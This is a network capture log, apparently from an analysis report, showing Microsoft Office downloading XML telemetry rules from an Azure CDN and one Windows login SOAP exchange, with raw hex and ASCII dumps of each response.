                                                                                                                                                      2024-12-04 12:59:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      59192.168.2.44982313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:13 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:14 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 427
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                      ETag: "0x8DC582BA909FA21"
                                                                                                                                                      x-ms-request-id: ddae3c3f-c01e-008d-3acb-452eec000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125914Z-1746fd949bdqpttnhC1EWRe1wg00000001100000000045b0
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:14 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      60192.168.2.44982413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:14 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:14 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 486
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                      ETag: "0x8DC582B92FCB436"
                                                                                                                                                      x-ms-request-id: 85a33a74-901e-005b-1ccd-452005000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125914Z-1746fd949bdl6zq5hC1EWRf3ws00000000u000000000b6vz
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:14 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      61192.168.2.44982613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:14 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:14 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 423
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                      ETag: "0x8DC582BB7564CE8"
                                                                                                                                                      x-ms-request-id: 8da67b63-c01e-0034-2ecb-452af6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125914Z-1746fd949bddtfvqhC1EWRxbpg000000012000000000ayfp
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:14 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      62192.168.2.44982540.126.53.17443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:14 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                      Accept: */*
                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                      Content-Length: 4775
                                                                                                                                                      Host: login.live.com
                                                                                                                                                      2024-12-04 12:59:14 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                      2024-12-04 12:59:14 UTC568INHTTP/1.1 200 OK
                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                      Expires: Wed, 04 Dec 2024 12:58:14 GMT
                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                      x-ms-route-info: C533_BL2
                                                                                                                                                      x-ms-request-id: e4c1d99d-a90f-48ab-890a-e82c6976aab8
                                                                                                                                                      PPServer: PPV: 30 H: BL02EPF0001D7BF V: 0
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:13 GMT
                                                                                                                                                      Connection: close
                                                                                                                                                      Content-Length: 1918
                                                                                                                                                      2024-12-04 12:59:14 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      63192.168.2.44982713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:16 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 478
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                                                      ETag: "0x8DC582B9B233827"
                                                                                                                                                      x-ms-request-id: 9009c19b-701e-0053-74c6-453a0a000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125916Z-1746fd949bd54zxghC1EWRzre400000001eg000000009sfv
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:16 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      64192.168.2.44982813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:16 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 404
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                      ETag: "0x8DC582B95C61A3C"
                                                                                                                                                      x-ms-request-id: 7eb0f396-d01e-0066-0ac6-45ea17000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125916Z-1746fd949bd6ztf6hC1EWRvq2s00000000yg0000000032e1
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:16 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      65192.168.2.44982913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:16 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 468
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                      ETag: "0x8DC582BB046B576"
                                                                                                                                                      x-ms-request-id: 4ebe80de-801e-0047-51c8-457265000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125916Z-1746fd949bdb8xvchC1EWRmbd4000000013000000000bz62
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:16 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      66192.168.2.44983013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:16 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 400
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                      ETag: "0x8DC582BB2D62837"
                                                                                                                                                      x-ms-request-id: 00b51f18-a01e-000d-6fcc-45d1ea000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125916Z-1746fd949bdlnsqphC1EWRurw0000000016g0000000004m5
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:16 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      67192.168.2.44983113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:16 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:16 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 479
                                                                                                                                                      Connection: close
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                      ETag: "0x8DC582BB7D702D0"
                                                                                                                                                      x-ms-request-id: 46349be7-d01e-0017-71d1-45b035000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125916Z-1746fd949bd6ztf6hC1EWRvq2s00000000zg000000000x9m
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
